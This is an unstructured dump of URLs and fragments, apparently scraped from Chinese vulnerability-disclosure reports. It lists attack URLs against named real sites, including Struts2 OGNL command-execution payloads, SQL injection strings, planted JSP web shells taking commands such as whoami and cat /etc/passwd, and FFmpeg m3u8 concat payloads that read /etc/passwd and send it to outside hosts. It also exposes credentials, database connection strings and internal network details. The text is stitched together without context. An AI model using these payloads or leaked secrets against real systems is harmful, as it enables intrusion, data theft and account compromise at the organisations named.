ad%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E http://202.198.176.89/SecCenter/index.jsp http://**.**.**.**/bugs/wooyun-2010-0181276 http://yfgl.chinazxt.com http://yfgl.chinazxt.com/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://yfgl.chinazxt.com/repository/000000000/mytest.jsp http://**.**.**.** http://rap.taobao.org/account/all.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get%28%23parameters.rpsobj[0]%29,%23w.getWriter%28%29.println%2888888888-1%29,%23w.getWriter%28%29.flush%28%29,%23w.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse http://124.127.96.231:7001/indexlis.jsp url:test.baihe.com http://test.baihe.com/ jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8 http://support.huawei.com/myspace/mySmartCare.action http://support-trial.huawei.com/carrier/pageNotFound.action http://ent.ws.netease.com/admin/login.do http://soa.dongputech.com:7010/ one:10m http://wsq.discuz.qq.com/?c=index&a=viewthread&f=wx&tid=1&siteid=111111111 https://www.oshadan.com/main,关键字:Haier http://124.152.236.162 http://tzb.dept.ccut.edu.cn/ http://42.96.131.200:8081/index.html http://mobile.zhushou.sogou.com/android/recommend_category_detail.html?iv=25&id=76&start=0&limit=25&uid=ed83a60cea765d52e3c2ced557270c62&vn=5.0.5&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_21874_2&sc=0 http://video.grandcloud.cn/index.php?m=member&c=index&a=login https://36.110.135.63/ http://smsp.epicc.com.cn/WXWeb/$guangd/picchtml5/view/casualtyInsuranceDotAction.action http://mail.hundsun.com/ luyf:windows@1 https://synergy.hundsun.com/ https://synergy.hundsun.com/weaver/weaver.file.FileDownload?fileid=426840&coworkid=0&requestid=0&desrequestid=0 https://home.hundsun.com/other/guide/Hundsun_guide.pdf https://vpn.www.hundsun.com/ https://sslvpn.www.hundsun.com https://192.168.60.49/options.cgi http://192.168.61.35/Citrix/XenApp/clientDetection/downloadNative.aspx http://wan.40407.com http://wooyun.org/bugs/wooyun-2016-0177871 http://211.150.64.68/ http://183.131.12.139:81/phpmyadmin/ http://106.2.32.66:8080/webdav/ http://www.pyyx.com/admin/impression/comment?all=1&p=8 http://www.pyyx.com/admin/impression/comment?all=1&p=8 http://redmine.pyyx.com http://www.pyyx.com/admin http://live.k.sohu.com/api/function/getChannelPackageUrl.go?channelId=1003 http://ebidding.sinopec.com:8880/TPWeb4AAA/Showinfo/SearchResult.aspx?keyword="查询内容"&searchtype=title http://**.**.**.**/ http://**.**.**.**/pay/alipay2/ http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 http://**.**.**.**/pay/alipay2/ http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 http://**.**.**.** http://124.207.206.223:8080/synthquery/ http://124.207.206.223:8080/zecmd/zecmd.jsp?comment=whoami jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:dev3 jdbc:oracle:thin:@**.**.**.**:1521:dev3 jdbc:oracle:thin:@**.**.**.**:1522:gywsdj jdbc:oracle:thin:@**.**.**.**:1521:ora9i jdbc:oracle:thin:@**.**.**.**:1522:orcl10g jdbc:oracle:thin:@**.**.**.**:1521:test141 jdbc:oracle:thin:@**.**.**.**:1521:oracle9i jdbc:sqlserver**.**.**.**:2010;DatabaseName=SXQXT jdbc:sqlserver**.**.**.**:1433;DatabaseName=OpenMas www.sf-ecs.com http://mer.lakala.com:28280/使用的是jboss。而且jmx-console还存在,于是拿出tangscan的某插件,测试发现居然是存在的 http://lib.wap.zol.com.cn/ask/app/addReplyGood.php http://lib.wap.zol.com.cn jdbc:oracle:thin:@localhost:1521:orcl http://fe.social-touch.com:30082/account/all.action的第一感觉就是struts2。拿出了tangscan插件测试 http://api.51xingke.com/index/getshoplist?city=1&cls=0&count=0&distance=0&f=2&ismore=0&key=%E6%9C%A8&lat=22.539498&lng=113.944141&type=0&v=5 http://api.51xingke.com/index/getshoplist?distance=0&lat=22.539498&lng=113.944141&cls=0&type=0&count=0&ismore=0&city=1&key=%E6%9C%A8&v=5&f=2 http://**.**.**.**/family/home-short.action||yes http://**.**.**.**/activity/star-service.action http://srm.rapoo.cn:8090 http://**.**.**/%28S%282m0o13alnrk4z2zocut0bdq1%29%29/PDFFiles/Certificate/14740/ce134cfd-a3d6-489c-8b28-f6b41d827318.aspx http://tvpic.wasu.cn/enterRegedit.action http://qns.geely.com/QNS/auth/auth/login.action http://60.191.59.19:9090/看这个界面就惊呆了,好吧,其实就是个开发测试环境 http://**.**.**.**:80/ http://**.**.**.**:888 http://**.**.**.**:888/gdr.jsp jdbc:oracle:thin:sas/34cusd3sas5@**.**.**.**:1521/sasdb http://dongguan.l99.com http://**.**.**.**/s/1kVdErzT F7:07:08:BE F7:07:08:5E F7:07:48:6C F7:07:0A:4E F7:07:0B:16 F7:07:0E:8A F7:07:0D:AA F7:07:09:44 F7:07:0E:84 F7:07:0C:8E F7:07:0C:06 F7:07:0F:0C F7:07:0D:F0 F7:07:0F:08 F7:07:0D:5C F7:07:0D:52 F7:07:07:7E F7:07:0E:F6 F7:07:0F:16 F7:07:34:E0 F7:07:33:48 F7:07:49:EC F7:07:48:F4 F7:07:09:E4 F7:07:4D:2C F7:07:4D:60 F7:07:4C:24 F7:07:4C:74 F7:07:48:B0 F7:07:4B:10 F7:07:49:08 F7:07:4E:04 F7:07:4D:9C F7:07:4D:84 F7:07:46:EC F7:07:31:C4 F7:07:31:BC F7:07:33:04 F7:07:31:9C F7:07:31:D8 F7:07:33:10 F7:07:32:28 F7:07:31:48 F7:07:32:98 F7:07:31:6C F7:07:31:FC F7:07:32:18 F7:07:32:A0 F7:07:32:1C F7:07:30:FC F7:07:32:10 F7:07:30:DC F7:07:30:80 F7:07:32:00 F7:07:32:8C F7:07:32:94 F7:07:32:BC F7:07:32:C4 F7:07:31:78 F7:07:32:38 F7:07:32:D8 F7:07:31:C0 F7:07:32:30 F7:07:33:30 F7:07:31:24 F7:07:41:90 F7:07:39:D8 F7:07:36:4C F7:07:40:7C F7:07:3A:B4 F7:07:3A:F0 F7:07:3D:68 F7:07:3C:10 F7:07:41:C0 F7:07:3B:DC F7:07:43:24 F7:07:35:58 F7:07:3E:A4 F7:07:42:BC F7:07:44:34 F7:07:46:50 F7:07:3C:0C F7:07:3F:F4 F7:07:40:00 http://dx.synu.edu.cn/ArticleType.asp?boardname=&classid=1 http://211.150.77.81 http://wiki.wooyun.org/pentest:filepath http://**.**.**.**/ http://m.hbhk.com.cn:81/new_wap/index.html http://jwc.synu.edu.cn/website/newstemplate/newsallcontent.jsp?newsId=160428111751 http://m.abab.com/index.php?a=Search&keyWord=会说话的狗狗本 http://211.150.64.118/zabbix/ http://120.27.165.232/cmp/login.htm http://passport.house365.com/?city=nj&app=default&act=login主站登陆的地方有验证码 http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do http://www.kumayi.com:80/ www.kumayi.com http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh= http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=-1 http://**.**.**.**/news/newslist.php?categoryId=15 http://58.68.130.68/wis18/customerjsp/msyh/login/login.jsp http://219.135.189.180:8081/services/MobileService http://219.135.189.182:8081/services/MobileService http://wooyun.org/bugs/wooyun-2016-0169453 http://60.211.217.162:9001/opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/userIcon/117743/header.jsp http://60.211.217.162:9001/fqApi/api/stuUser/headerPicUpload.do http://mail.tianan-life.com/ http://wx.sohu-inc.com http://wx.sohu-inc.com/index.jsp http://qks.hnist.cn/xb/digest?paperID=228 http://61.187.92.238:8610/printpage.asp?ArticleID=565 http://61.187.92.238:8610/Admin_Login.asp http://www.8dov.cn:8086 http://t.abic.cn:9085/GalaxyEarth/ http://map.ab95569.cn/ http://**.**.**.**/?p=1548),而且还是system权限。 http://115.182.85.139/secure/ http://10.219.18.63/ http://forum.internal.sina.com.cn/idc/main/list.asp http://papa.me/studio/login/mobile接口登陆的地方没有登陆限制 http://cwc.synu.edu.cn/website/secondPages/secondIndex.jsp?i=0&ItemIdType=null&parentItemId=77 http://www.cau-edu.com/ http://www.cau-edu.com/phpMyAdmin/ http://**.**.**.**/ http://**.**.**.**/api/shell.php http://form.pkusz.edu.cn/oqss/user/ForgetPSW.aspx http://project.youku.com/minisite/admin/index.php http://project.youku.com/minisite/admin/module_info.php?mid=2 http://60.175.6.68/ http://www.airpp.com/frontTicketHelpAction!aboutus.action http://sys.airpp.com http://sys.airpp.com/ http://www.ntcu.edu.tw/sa/news5/view.asp?ID=8376 http://ms3.ntcu.edu.tw/sa/link/htm/news/view.asp?ID=1804 http://**.**.**.**/WeChatService/OrderDetails.htm?Id=75324 http://manager.healthmall.tv:8088/SyatemManagement/NewLogin.aspx tv:8088 https://**.**.**.**/ http://111.13.87.178/ http://111.13.87.178/christian/mysqlapi/repository/archive.zip?ref=master http://111.13.87.178/root/dpadmint.grid.sina.com.cn/repository/archive.zip?ref=master http://111.13.87.178/jingbo8/redis_auto/repository/archive.zip?ref=master http://111.13.87.178/root/idb.cluster.sina.com.cn/repository/archive.zip?ref=master er.sina.com.cn/auto***** ina.com/add_a***** http://school.61learn.com/delete_cart_goods.php http://shop.61learn.com/delete_cart_goods.php http://smtp.jingzhengu.com:8080/Login/EPLogin.html http://acm.hpu.edu.cn/swzl/findAllLose?key=-1 http://cms.jingzhengu.com/admin/login.aspx http://info.hnist.cn//getPassword.jsp?btn1=%bb%f1%c8%a1%c3%dc%c2%eb&birthday1=%c8%e7%a3%ba19880812&birthday3=%c8%e7%a3%ba19880812&id=-1 http://em.xidian.edu.cn/course/yc/admin/primarypage.asp http://hlqk.feiliu.com/countc/downcount/?type=1&resource=fl http://rose.feiliu.com/newsc/news_list/?&start=8 https://59.61.80.154:10443/sslvpn/portal.html http://zone.wooyun.org/content/22529 http://zone.wooyun.org/content/21962 http://bbs.3737.com/faq.php http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=1 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=111 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2010 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2011 http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20and%201=1 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20an%d%201=1 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35%20an%d%201=11 http://hqjt.xidian.edu.cn/Logistics_talent.asp?bh=578&id=35 http://**.**.**.**/message.do http://223.203.210.213/plugins/weathermap/configs/wooyun.php http://www.mengniuir.com/c/ir_presentation.php?year=2007 http://xw.em.swjtu.edu.cn/Epaper/Default.aspx?CurEID=1&CurFC= http://www.aokang.cn/member/login.aspx http://ebooking.lvmama.com/ http://www.lvmama.com/favicon.ico http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css http://pic.lvmama.com/styles/v5/ebk.css http://pic.lvmama.com/js/common/losc.js http://pic.lvmama.com/js/common/losc.js http://pcp.povos.com.cn/ http://pcp.povos.com.cn/news_detail.jsp?id=10410 http://oa.okair.net/seeyon/index.jsp https://111.160.87.131/por/login_psw.csp http://172.16.3.110/login.action http://lcx.cc/?i=3838 http://166.111.9.20:802/View/Login.aspx http://166.111.9.20:803/View/Login.aspx http://166.111.9.22:802/View/Login.aspx http://166.111.9.22:803/View/Login.aspx http://166.111.9.22:8088/View/Login.aspx http://vcarmove.vcyber.com:9020 http://oa.21tb.com/ http://m.api.qmango.com/hotels.asmx/getHotelsJson_Mango http://**.**.**.**/bugs/wooyun-2010-0112629 encap:Ethernet CD:72:93 fecd:7293/64 Scope:Link MTU:1500 packets:233491010 packets:228417700 txqueuelen:1000 http://pms.bxjr.com/redmine/projects http://pms.bxjr.com/redmine/projects/app-iphone/wiki http://gz.zhujia360.com/article/list/cate_id/42* http://fenxiao.zhujia360.com/crm.php?r=login http://fenxiao.zhujia360.com http://act.vg.ztgame.com/live/public/newsinfo/36 http://222.92.3.77/ http://www.yupoo.com/account/login/ http://beijing.vanke.com/ http://e-station.cimc.com/Login.aspx?RequestUrl=http%3a%2f%2fe-station.cimc.com%3a8083%2fDefault.aspx http://ueditor.baidu.com/website/onlinedemo.html http://game.m.sohu.com http://www.u193.com/top.php?gid=306 http://e.dangdang.com/media/api.go?action=specialtopichistory&channelId=1&channelType=html5*&channelType=ALL&clientVersionNo=5.0.0&deviceSerialNo=html5 http://www.baimei100.com/ http://123.57.233.181:28017/log.txt http://www.cclinux.com/index/opensoft.asp?soft_id=18&url=2 http://www.minanins.com/maechannel/manage/info/listNewsAjaxCallFront.do http://job.shmtu.edu.cn/qiyezhmm.asp?type=2 http://123.127.110.171:8001/sireports/login.do?method=indexpage encap:Ethernet AE:8B:26:EA:4A addr:192.168.10.165 Bcast:192.168.10.255 Mask:255.255.255.0 fe26:ea4a/64 Scope:Link MTU:1500 packets:252442835 packets:211675215 txqueuelen:1000 http://soft.ksbao.com/search.aspx?key=1&showOne=1 http://soft.ksbao.com/search.aspx?key=1%27;WAITFOR%20DELAY%20%270:0:5%27--&showOne=1 http://mba.cau.edu.cn http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump¶ms={"app_version":"193","device_id":"A0000038518D0C-d3ff252e6543971a http://**.**.**/ http://**.**.**/bugs/wooyun-2010-052615 http://**.**.**/bugs/wooyun-2010-0128938 http://114.80.121.110:8990/login.do http://120.52.145.59:8080/admin/login.html http://120.52.145.59:8080/governance/services/com.pingan.pafa.fling.monitor.FlingMonitorDubboServices/owners http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350421088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350521088 http://eservice.hxlife.com/Policy/policyContent.do?policyNo=2015137350621088 http://eservice.hxlife.com/Policy/appntQuery.do?policyNo=2015137350622088 http://eservice.hxlife.com/Policy/shouyimanQuery.do?policyNo=2015137350623088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350624088 http://eservice.hxlife.com/Policy/passiveQuery.do?policyNo=2015137350624+1逻辑查询上万用户订单088 https://m.ehuobang.com/app/ajax/user.php?action=logintel http://m.ehuobang.com http://**.**.**/download/ mobds.ganji.cn/datashare/ http://b2e.ceair.com/DeptDefault.aspx http://219.133.73.185:81/admin/login.do http://travel.sina.com.hk/swf/photoslide.swf?x=/api/photoslide/weibo/local/sidebar/1.xml?1461050406000 http://**.**.**.**/softac/login.jsp https://**.**.**.**/beetle-jp/indexAction.action http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:tcmpdb http://crm.kongzhong.com/subscribe.php http://98.126.98.35/radius/ http://www.imxvpn.com/ http://open.qyer.com/qyer/company/default_list?citys_str=52&client_id=qyer_ios&client_secret=cd254439208ab658ddf9&count=1&lat=1&lon=1&oauth_token=ab&page=1&track_app_channel=App%2520Store&track_app_version=6.8.5&track_device_info=iPhone8%2C1&track_deviceid=564443CC-9189-42C1-9CC9-0922116AD5C4&track_os=ios%25209.3.1&track_user_id=7851234&v=1 http://**.**.**.**:3000/web/initAction.action http://ums.iboxpay.com/mcht-self/ www.mojing.cn http://www.mojing.cn http://blog.zenzet.com:8010/wordpress/ encap:Ethernet addr:192.168.10.161 Bcast:192.168.10.255 Mask:255.255.255.0 fe02:1a20/64 Scope:Link MTU:1500 packets:285900085 dropped:137967 packets:268148077 txqueuelen:1000 http://le.yanbao.org http://wx.guodu.com/ http://211.144.149.2/mic/admin/check.action webpath:C:\Program whoami:2003server\administrator jdbc:oracle:thin:@192.168.7.130:1521 http://**.**.**.**/index.action http://azss2resource.game.mojing.cn/?keywords=1&page=1 http://219.133.36.173:89/phpmyadmin/ ip:119.254.93.70 http://119.254.93.70:8002/zc19/1.jsp http://119.254.93.71:8002/qtfr/login/login.jsp的 http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://open.mojing.cn/developer/feedback/submit http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC&callback=jQuery172013711762335151434_1461556777871 http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016 http://webmail.jsbchina.cn/webmail/login/login.do http://bsms.ccut.edu.cn/ http://social.all-wifi.cn/index.php/login/login http://ad.all-wifi.cn/index.php/index/index.html http://pastebin.com/aE4sKnCg http://**.**.**.** jdbc:oracle:thin:@**.**.**.**:1521:testorcl user:exam2 password:exam2 http://accesslicense.hd.sohu.com:8888/device?_method=post®ister=True&smsDeviceId=27 http://59.40.77.37:7001/tcmp/bizframe/jsp/login.jsp http://fota.yitiji.mojing.cn/admin/ http://fota.yitiji.mojing.cn/admin/upgrade/editup?id=24&versionid=16 http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20--%20%20-&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/ report:Array http://**.**.**.**/ http://120.197.93.208:8085/loginAction!login.e http://st.renren.com/create http://shitu.baidu.com/ http://shitu.baidu.com/n/searchpc?queryImageUrl=http%3A%2F%2F115browser.com%2Fexp1.png http://mail.9air.com/ http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A http://crew.9air.com/personal_change_password.jsp http://crew.9air.com/personal_change_password.jsp http://www.openwall.com/lists/oss-security/2016/05/03/18 http://www.lizi.com/user/resetPwd https://hackerone.com/reports/115857 https://habrahabr.ru/company/mailru/blog/274855/ http://tuan.airchina.com/booking/payForGroupTicket.htm?oid=760004 https://hackerone.com/reports/115857 https://habrahabr.ru/company/mailru/blog/274855/ http://i.youku.com/u/setting/base_avatar.html http://**.**.**.**/Report//userlogin.action存在命令执行漏洞 https://passport.mafengwo.cn/setting/avatar/ http://www.multigold.com.cn/forgetPassword.html www.multigold.com.cn http://www.multigold.com.cn http://www.airshop.com.cn/ http://www.airshop.com.cn/ffpclub/kingpeng_list.php http://www.airshop.com.cn/ffpclub/kingpeng_list.php?keyword=if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29/*%27XOR%28if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29%29OR%27%22XOR%28if%28now%28%29%3dsysdate%28%29%2csleep%280%29%2c0%29%29OR%22*/ https://m.mafengwo.cn/nb/public/xauth_change_user.php https://wx2.qq.com/ http://www.kaixin001.com http://www.kaixin001.com/home/ http://www.kaixin001.com/photo/act_view_42.html https://github.com/upcgaolei/meshop/blob/5884178a19b966ddffe1368bb183aff7b177be79/_book/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.md https://ssl.corp.gome.com.cn https://10.128.14.233 http://lvyou.elong.com/home/pictorial.html?do=add http://blog.ifeng.com/ http://www.ganji.com/pub/pub.php?act=pub&method=load&cid=7&mcid=23&domain=cd&_pdt=fang http://bbs.sina.com.cn/ http://quanzi.zbj.com/main/view-qid-10470.html jdbc:mysql:// www.mlairport.com www.mlairport.com http://**.**.**.**/jsoa/login.jsp http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate= http://i.liebao.cn/index.html http://bbs.qiku.com http://114.215.138.214/ https://hackerone.com/reports/115857 http://www.iqiyi.com/u/editor/ EXTINF:10.0 concat:http://115browser.com/mp4/remote.m3u8 http://opm.netease.com encap:Ethernet e6:ca:a8 addr:10.63.5.30 Bcast:10.63.5.255 Mask:255.255.255.0 MTU:1500 packets:65462274 packets:9647067 txqueuelen:1000 EXTINF:10.0 concat:http://pictest.66ae2b.dnslog.info|file:///proc/sys/kernel/hostname http://bbs.163.com/user http://ffp.shenzhenair.com/ffp/À®/WEB-INF/modules/struts-config-codingShare.xml EXTINF:10.0 concat:http://aaa00e.dnslog.info http://vku.sdo.com/proxy.php?name=1&pwd=11&src_url=file:///etc/passwd http://esms.cs-air.com/main/UserManager-esmsLogin.action http://**.**.**.**/ http://**.**.**.**/webservice/services/webservice?wsdl http://yunying.yupaopao.cn/home/nim http://yunying.yupaopao.cn/home/nim http://121.40.188.99/admin/index#rechargeList www.huaweihcc.com www.huaweihcc.com http://180.97.104.136:8001/ http://180.97.104.136:8001/is/index.jsp http://um.mama.cn/passport/wapindex/findPassword/),如图所示: http://api.xiaokaxiu.com/common/api/upload_headface jdbc:oracle:thin:@**.**.**.**:1521:YWXT2 jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://www.zcool.com.cn/ http://**.**.**.**:7001/defaultroot/UploadServlet http://**.**.**.**:7001/defaultroot/upload/test/123459/1234592.jspx?cmd=dir http://zone.wooyun.org/content/27086,https://www.ffmpeg.org/ffmpeg-protocols.html#subfile EXTINF:10.0 concat:http://test.com/header.m3u8|file:///etc/passwd http://test1.com/ http://test1.com/的web日志中可查看读取的文件内容,在这里我使用了hawkeye平台的Web访问日志查询功能可方便查看结果: file:///etc/passwd只能查看到第一行内容,好像是遇到换行符时,换行符之后的文件内容不再返回(实践证明确实如此),但是可以使用subfile分段读取文件,因此修改之后的vdisk.avi内容如下: EXTINF:10.0 concat:http://test.com/header.m3u8|subfile,,start,30,end,120,,:///etc/passwd http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM http://**.**.**.**/inquire!Microsoft| http://58.83.214.128:8888/admin/login/?next=/admin/ http://203.187.184.7/mty/logon.jsp http://203.187.184.7/mty/sadtlquery.do?id=1638174&supplyid=5355&supplyname=%B0%B2%BB%D5%CA%A1%D2%BD%D2%A9%A3%A8%BC%AF%CD%C5%A3%A9%B9%C9%B7%DD%D3%D0%CF%DE%B9%AB%CB%BE jdbc:oracle:thin:@**.**.**.**:1521:jsws http://122.119.74.149/ceagent/front/regist/agency-regist!doFillInfo.shtml http://122.119.74.149 http://v.163.com/paike/y3/upload EXTINF:10.0 concat:http://aaa.com/header.m3u8|file:///etc/passwd http://aaa.com/header.m3u8为你自己的web服务器上的文件 http://aaa.com http://106.39.162.14:80/ http://106.39.162.14/test/index.jsp http://61.145.111.17:8001/index http://bbs.wan.58.com http://115.182.92.226/zabbix/ http://115.182.92.226/zabbix/synthtisme_report.php?sid=6490833fb62bd800&business=not+selected&module=all&local=all&groups=ALLHOSTS&tag=&hosts=&bgndate=2015-01-06&enddate=2016-05-07&sel=shixu&load15=system.cpu.load%5B%2Cavg15%5D&avg15_sel1=max&avg15_sel2=%3E%3D&avg15_sel3=0&single_load=system.cpu.load.single&singleload_sel1=max&singleload_sel2=%3E%3D&singleload_sel3=0&cpu_util=system.cpu.util%5B%2Cidle%2Cavg1%5D&cpu_sel1=max&cpu_sel2=%3E%3D&cpu_sel3=0&pswpin=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpin%2C2%5D&pswpin_sel1=max&pswpin_sel2=%3E%3D&pswpin_sel3=0&pswpout=check.catiops%5B%2Fproc%2Fvmstat%2Cpswpout%2C2%5D&pswpout_sel1=max&pswpout_sel2=%3E%3D&pswpout_sel3=0&swap_use=system.swap.size%5B%2Cpused%5D&swap_sel1=max&swap_sel2=%3E%3D&swap_sel3=0&readio=readio&rio=vfs.dev.read%5Bsda%2Cops%5D&rio_sel1=max&rio_sel2=%3E%3D&rio_sel3=0&writeio=writeio%3E&wio=vfs.dev.write%5Bsda%2Cops%5D&wio_sel1=max&wio_sel2=%3E%3D&wio_sel3=0&tr_in=tr_in&trin_sel1=max&trin_sel2=%3E%3D&trin_sel3=0&tr_out=tr_out&trout_sel1=max&trout_sel2=%3E%3D&trout_sel3=0&packets_in=packets_in&packetsin_sel1=max&packetsin_sel2=%3E%3D&packetsin_sel3=0&packets_out=packets_out&packetsout_sel1=max&packetsout_sel2=%3E%3D&packetsout_sel3=0&go=%E6%9F%A5%E8%AF%A2 http://14.152.92.77:8080/admin/adminLogin.action http://218.241.156.10:7001/jtbx http://**.**.**.**/bugs/wooyun-2010-0204620 http://**.**.**.**:5118/softac/login.jsp http://yfpt.csc.com.cn:8080/km/login.dhtml主要包括两个漏洞 http://mapsrch.house.sina.com.cn:8081/gss/simple?encode=utf-8&srctype=POI&number=10&batch=1&range=3000&resType=json&retvalue=1&key=16a4150d21aaee9be07ce960b867f37003afd183c8306ae139ac98f432932286151dc0ec55580eca'&sid=1002&cenX=116.314553&cenY=39.820966&keyword=&rid=74248 http://121.14.19.23:9001/ http://121.14.19.23:9001/bea_wls_internal/test.jsp http://webmap1.map.bdimg.com/maps/services/thumbnails?width=215&height=145&quality=120&align=middle,middle&src=http://101.200.**.**:8081 http://ht.52xinyou.cn/xykj/login.aspx http://www.xueyazhushou.com/info/infocontent.php?info_id http://yfpt.csc.com.cn:8080/km/login.dhtml www.xueyazhushou.com http://www.xueyazhushou.com/api/upload.php www.xueyazhushou.com http://www.guoyaoyaocai.com/ http://oa.guoyaoyaocai.com/seeyon//logs/login.log http://58.16.64.31/index.action jdbc:oracle:thin:@**.**.**.**:1521:tyxzsp http://oa.my089.cn:7001/defaultroot/Logon!logon.action jdbc:oracle:thin:@**.**.**.**:1521:epaydb http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://img2.3lian.com/img2007/19/33/005.jpg http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1 http://shortgroup.foresealife.com/echannel/forgetPassword/ http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI1NTg=/activate/d9728895e2ffa0aa024f92d43da5868e http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI4NDk=/activate/76fb8f481cd887e83ffb43494d510f7a http://shortgroup.foresealife.com/echannel/uum/member/resetPassword/NDI1NTg%3D/activate/76fb8f481cd887e83ffb43494d510f7a.json http://shortgroup.foresealife.com http://wooyun.org/bugs/wooyun-2010-0178883 http://125.88.171.12:8008/ http://125.88.171.12:8008//plugins/weathermap/configs/ceshi.php http://120.55.144.142/projects(注:之前未授权可访问)但重要系统配置还是泄漏了。 http://ebooking.elong.com/ebkauth/forgotpwd http://117.135.159.4:8888/ https://eb.ceair.com https://eb.ceair.com/uploadimages/ http://eb.ceair.com/Appeal/Admin/Login.aspx https://vpn.ehomepay.com.cn http://**.**.**.**/page/show.aspx?id=966 http://**.**.**.**/page/login.aspx http://mm.manhuadao.cn/admin/ http://115.182.70.165:8060/login_login.action http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp http://op.esf.sina.com.cn/login http://101.227.68.197:9981/ http://feature.mtime.com/mobile/ http://**.**.**/GetHotelListAction!initc.do http://**.**.**/GetHotelListAction!initc.doredirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22Test http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/ssh/ssh_config_ http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/passwd_ root:/***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** 